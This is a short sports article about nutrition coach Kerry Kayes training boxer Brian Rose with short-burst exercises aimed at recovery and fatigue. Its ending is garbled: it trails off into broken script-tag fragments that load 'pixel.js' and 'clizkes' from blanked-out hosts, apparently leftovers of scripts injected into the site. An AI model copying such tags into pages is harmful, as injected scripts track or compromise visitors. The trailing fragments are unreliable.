We spoke to former British bodybuilding champion and nutrition and strength expert Kerry Kayes, while he was putting British light-middleweight champion Brian Rose through a training session designed to help with his recovery rate during a fight.

Kayes, the founder of CNP and the Betta Bodies Gym in Manchester, has been synonymous with boxing since his involvement with former two weight world champion Ricky Hatton, Kayes was responsible for helping ‘The Hitman’ prepare for fights and has since helped a succession of boxers in a more scientific way with nutrition, strength and conditioning training, designed to work hand in hand with traditional boxing methods.

The idea behind the workout Kerry is doing with Brian in the video, is designed for the boxer to increase phosphate by using aerobic and anaerobic exercises to tap into three different energy systems (CP, aerobic and anaerobic) to get the most benefit out of the least and counteract muscle fatigue with specially designed short burst exercises.

We will cover this subject in more depth and other nutrition and conditioning advice with Kerry in future articles and videos.# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://land.#/clizkes’ type=’text/javascript’># src=’https://#/clizkes’ type=’text/javascript’>
